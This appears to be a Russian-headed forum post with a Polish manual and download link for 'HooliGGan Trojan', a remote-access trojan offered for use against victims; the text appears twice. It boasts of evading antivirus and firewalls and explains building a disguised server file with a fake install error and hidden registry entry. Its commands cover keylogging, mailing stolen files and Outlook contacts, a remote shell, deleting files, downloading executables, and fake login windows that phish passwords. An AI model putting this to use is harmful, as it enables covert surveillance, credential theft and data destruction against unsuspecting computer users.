HooliGGan Trojan A+ [firewall bypassing]
НА-МОМЕНТ-ПОСТИНГА-НЕ-ПАЛИТСЯ НИЧЕМ,КРОМЕ НОДА.
screensotZ
неплохо...если учесть возможность убийства фаеров...
описание:
Konfiguracja:
Zakładka gg connect
*server gg number - numer nowo utworzonego konta gg
*server gg password - hasło nowo utworzonego konta gg
*client gg number - twój numer gg
Zakładka e-mail
*server mail SMTP - SMTP nowo utworzonego konta pocztowego
*server mail address - adres nowo utworzonego konta pocztowego
*server mail password - hasło nowo utworzonego konta pocztowego
*client mail address - adres twojego konta pocztowego
Zakładka killer
zaznaczamy które procesy mają być zabite i blokowane przed uruchomieniem (ilość wybranych pozycji może ujemnie wpływać na pracę servera); jest to wersja "light killer" która zabija i blokuje tylko zwykłe procesy
Zakładka GENERATE
ustawiamy opcje instalacji i generujemy server trojana do przesłania ofierze:
*load icon - wybieramy ikonę dla pliku servera
*UPX compress - pakuje server trojana
*add to SP2 firewall rules - dodaje server trojana do wyjątków SP2 firewalla u ofiary
*block TaskManager - wyłącza Manager Zadań
*keylogger on startup - aktywuje keylogger przy starcie servera
*send logs (30 min.) - automatyczne wysyłanie logów keyloggera
*SPOILER in registry - chowa wpis w rejestrze (niewidzialny przez HijackThisa)
*show Error during install - dla zmylenia ofiary pokazuje błąd po otwarciu pliku servera
*install patch - ścieżka gdzie ma się zainstalować trojan, możemy sami ręcznie wpisać lub wybrać jedną z pozycji, np. X:\WINDOWS wtedy trojan wyszuka na którym dysku jest zainstalowany Windows i tam się zainstaluje
*install file name - nazwa pod jaką zainstaluje się server u ofiary (koniecznie z rozszerzeniem exe)
*install description - opis pliku który zainstaluje się u ofiary (bez spacji !!!)
*server file name - nazwa pliku który chcemy podesłać ofierze (koniecznie z rozszerzeniem exe)
*GENERATE server - wygenerowanie servera trojana do przesłania ofierze
----------
Komendy:
/info - info o wersji trojana
/victiminfo - przesyła info o ofierze (nazwa kompa, user, rodzaj systemu, IP, rozdzielczosc, serial key Windowsa)
/del - bezpowrotne skasowanie pliku (np. /del c:\fotka.jpg)
/deltree - bezpowrotne skasowanie katalogu (np. /deltree c:\FOTKI)
/run - uruchomienie danego procesu na kompie ofiary (np. /run c:\flashget\flashget.exe)
/hdd - info o wszystkich dyskach i napędach ofiary
/process - wyświetla wszystkie procesy z kompa ofiary
/dir - przeglądnięcie danego katalogu (np. /dir c:\Zbyszek\Fotki)
/kill - zabicie działającego procesu na kompie ofiary (np. /kill emule.exe)
/search - szukanie pliku na kompie ofiary (np. /search *.jpg)
/mail - wysłanie pojedynczego pliku z kompa ofiary na maila (np. /mail c:\Zbyszek\Fotki\fotka.jpg)
/keyloggeron - zdalne włączenie keyloggera u ofiary (jeśli nie został aktywowany przy konfiguracji servera)
/keyloggeroff - zdalne wyłączenie keyloggera
/sendlog - przesłanie logów keyloggera z kompa ofiary
/cmd - dostęp do CMD ofiary, po tej komendzie wysyłamy tylko standartowe komendy cmd (dir, cd itp.). Jeśli chcemy wyjść z CMD wpisujemy exit lub /cmdoff. Od tego momentu możemy znów wysyłać komendy trojana.
/cd - wysuwa tackę CD
/voice - wypowiada tekst u ofiary (np. /voice jak sie masz)
/rotate - odwracapulpit do góry nogami
/negative - negatyw pulpitu
/outlook - importuje z Outlooka: nazwę, adres e-mail, tel.domowy, tel.komórkowy i nam wysyła na gg
/banner - wyświetla banner z takstem (np. /banner jak się masz)
/SPOILERicons - chowa ikony na pulpicie
/showicons - pokazuje ikony na pulpicie
/print - drukuje ofierze wybrany przez nas dokument (np. /print c:\Zbyszek\CV.doc)
/SPOILERtray - ukrywa tray
/monitoroff - wyłącza ofierze monitor
/monitoron - włącza monitor
/wardate - zmienia datę w kompie ofiary na 1września1939
/SPOILERclock - chowa ofierze zegar
/showclock - pokazuje wcześniej ukryty zegar
/uploadexe - pobiera z internetu plik exe i zapisuje w c:\hool.exe, adres strony podajemy bez "www." (np. uploadexe portal/downloads/przykład.exe)
/uploadjpg - pobiera z internetu plik jpg i zapisuje w c:\hool.jpg, adres strony podajemy bez "www." (np. uploadjpg portal/downloads/przykład.jpg)
/uploadbmp - pobiera z internetu plik bmp i zapisuje w c:\hool.bmp, adres strony podajemy bez "www." (np. uploadbmp portal/downloads/przykład.bmp)
/drawdesktop - rysuje na pulpicie wybraną bitmapę (np. /drawdesktop c:\Zbyszek\rysunek.bmp)
/screen - wysyła na nasze gg screen z komputera ofiary
/view lub /viewjpg - wysyła na gg podgląd obrazka jpg (np. /view c:\Zbyszek\obrazek.jpg)
/playmedia - odgrywa na kompie ofiary pliki avi, mp3, wav (np. /playmedia c:\Zbyszek\Muzyka\discopolo.mp3)
/stopmedia - zatrzymuje odgrywanie
/wallpapper - ustawia tapetę u ofiary, tylko pliki bmp (np. /wallpapper c:\Zbyszek\rysunek.bmp)
/clipboard - wysyła nam na gg tekst ze schowka ofiary
/askforgg - u ofiary wyskakuje fałszywe okno gg proszące o podanie numeru gg i hasła po czym przesyła nam te dane na nasze gg
/askformail - jak wyżej tylko z mailem
/iestartpage - ustawienie strony startowej IE u ofiary, adres strony podajemy bez "www." (np./iestartpage trojanypl.org)
/disabletaskmgr - wyłącza Menedżera zadań u ofiary (stosujemy jeśli nie zrobiliśmy tej opcji w konfiguracji servera)
/enabletaskmgr - włącza Menedżera zadań u ofiary
/disconnect - rozłącza połączenie z serverem do następnego startu kompa ofiary
/uninstall - odinstalowanie trojana z kompa ofiary (po restarcie)
Берем-отсюда:
http://rapidshare.de/files/22010848/HooliG...ojanA_.rar.html
НА-МОМЕНТ-ПОСТИНГА-НЕ-ПАЛИТСЯ НИЧЕМ,КРОМЕ НОДА.
screensotZ
неплохо...если учесть возможность убийства фаеров...
описание:
Konfiguracja:
Zakładka gg connect
*server gg number - numer nowo utworzonego konta gg
*server gg password - hasło nowo utworzonego konta gg
*client gg number - twój numer gg
Zakładka e-mail
*server mail SMTP - SMTP nowo utworzonego konta pocztowego
*server mail address - adres nowo utworzonego konta pocztowego
*server mail password - hasło nowo utworzonego konta pocztowego
*client mail address - adres twojego konta pocztowego
Zakładka killer
zaznaczamy które procesy mają być zabite i blokowane przed uruchomieniem (ilość wybranych pozycji może ujemnie wpływać na pracę servera); jest to wersja "light killer" która zabija i blokuje tylko zwykłe procesy
Zakładka GENERATE
ustawiamy opcje instalacji i generujemy server trojana do przesłania ofierze:
*load icon - wybieramy ikonę dla pliku servera
*UPX compress - pakuje server trojana
*add to SP2 firewall rules - dodaje server trojana do wyjątków SP2 firewalla u ofiary
*block TaskManager - wyłącza Manager Zadań
*keylogger on startup - aktywuje keylogger przy starcie servera
*send logs (30 min.) - automatyczne wysyłanie logów keyloggera
*SPOILER in registry - chowa wpis w rejestrze (niewidzialny przez HijackThisa)
*show Error during install - dla zmylenia ofiary pokazuje błąd po otwarciu pliku servera
*install patch - ścieżka gdzie ma się zainstalować trojan, możemy sami ręcznie wpisać lub wybrać jedną z pozycji, np. X:\WINDOWS wtedy trojan wyszuka na którym dysku jest zainstalowany Windows i tam się zainstaluje
*install file name - nazwa pod jaką zainstaluje się server u ofiary (koniecznie z rozszerzeniem exe)
*install description - opis pliku który zainstaluje się u ofiary (bez spacji !!!)
*server file name - nazwa pliku który chcemy podesłać ofierze (koniecznie z rozszerzeniem exe)
*GENERATE server - wygenerowanie servera trojana do przesłania ofierze
----------
Komendy:
/info - info o wersji trojana
/victiminfo - przesyła info o ofierze (nazwa kompa, user, rodzaj systemu, IP, rozdzielczosc, serial key Windowsa)
/del - bezpowrotne skasowanie pliku (np. /del c:\fotka.jpg)
/deltree - bezpowrotne skasowanie katalogu (np. /deltree c:\FOTKI)
/run - uruchomienie danego procesu na kompie ofiary (np. /run c:\flashget\flashget.exe)
/hdd - info o wszystkich dyskach i napędach ofiary
/process - wyświetla wszystkie procesy z kompa ofiary
/dir - przeglądnięcie danego katalogu (np. /dir c:\Zbyszek\Fotki)
/kill - zabicie działającego procesu na kompie ofiary (np. /kill emule.exe)
/search - szukanie pliku na kompie ofiary (np. /search *.jpg)
/mail - wysłanie pojedynczego pliku z kompa ofiary na maila (np. /mail c:\Zbyszek\Fotki\fotka.jpg)
/keyloggeron - zdalne włączenie keyloggera u ofiary (jeśli nie został aktywowany przy konfiguracji servera)
/keyloggeroff - zdalne wyłączenie keyloggera
/sendlog - przesłanie logów keyloggera z kompa ofiary
/cmd - dostęp do CMD ofiary, po tej komendzie wysyłamy tylko standartowe komendy cmd (dir, cd itp.). Jeśli chcemy wyjść z CMD wpisujemy exit lub /cmdoff. Od tego momentu możemy znów wysyłać komendy trojana.
/cd - wysuwa tackę CD
/voice - wypowiada tekst u ofiary (np. /voice jak sie masz)
/rotate - odwracapulpit do góry nogami
/negative - negatyw pulpitu
/outlook - importuje z Outlooka: nazwę, adres e-mail, tel.domowy, tel.komórkowy i nam wysyła na gg
/banner - wyświetla banner z takstem (np. /banner jak się masz)
/SPOILERicons - chowa ikony na pulpicie
/showicons - pokazuje ikony na pulpicie
/print - drukuje ofierze wybrany przez nas dokument (np. /print c:\Zbyszek\CV.doc)
/SPOILERtray - ukrywa tray
/monitoroff - wyłącza ofierze monitor
/monitoron - włącza monitor
/wardate - zmienia datę w kompie ofiary na 1września1939
/SPOILERclock - chowa ofierze zegar
/showclock - pokazuje wcześniej ukryty zegar
/uploadexe - pobiera z internetu plik exe i zapisuje w c:\hool.exe, adres strony podajemy bez "www." (np. uploadexe portal/downloads/przykład.exe)
/uploadjpg - pobiera z internetu plik jpg i zapisuje w c:\hool.jpg, adres strony podajemy bez "www." (np. uploadjpg portal/downloads/przykład.jpg)
/uploadbmp - pobiera z internetu plik bmp i zapisuje w c:\hool.bmp, adres strony podajemy bez "www." (np. uploadbmp portal/downloads/przykład.bmp)
/drawdesktop - rysuje na pulpicie wybraną bitmapę (np. /drawdesktop c:\Zbyszek\rysunek.bmp)
/screen - wysyła na nasze gg screen z komputera ofiary
/view lub /viewjpg - wysyła na gg podgląd obrazka jpg (np. /view c:\Zbyszek\obrazek.jpg)
/playmedia - odgrywa na kompie ofiary pliki avi, mp3, wav (np. /playmedia c:\Zbyszek\Muzyka\discopolo.mp3)
/stopmedia - zatrzymuje odgrywanie
/wallpapper - ustawia tapetę u ofiary, tylko pliki bmp (np. /wallpapper c:\Zbyszek\rysunek.bmp)
/clipboard - wysyła nam na gg tekst ze schowka ofiary
/askforgg - u ofiary wyskakuje fałszywe okno gg proszące o podanie numeru gg i hasła po czym przesyła nam te dane na nasze gg
/askformail - jak wyżej tylko z mailem
/iestartpage - ustawienie strony startowej IE u ofiary, adres strony podajemy bez "www." (np./iestartpage trojanypl.org)
/disabletaskmgr - wyłącza Menedżera zadań u ofiary (stosujemy jeśli nie zrobiliśmy tej opcji w konfiguracji servera)
/enabletaskmgr - włącza Menedżera zadań u ofiary
/disconnect - rozłącza połączenie z serverem do następnego startu kompa ofiary
/uninstall - odinstalowanie trojana z kompa ofiary (po restarcie)
Берем-отсюда:
http://rapidshare.de/files/22010848/HooliG...ojanA_.rar.html
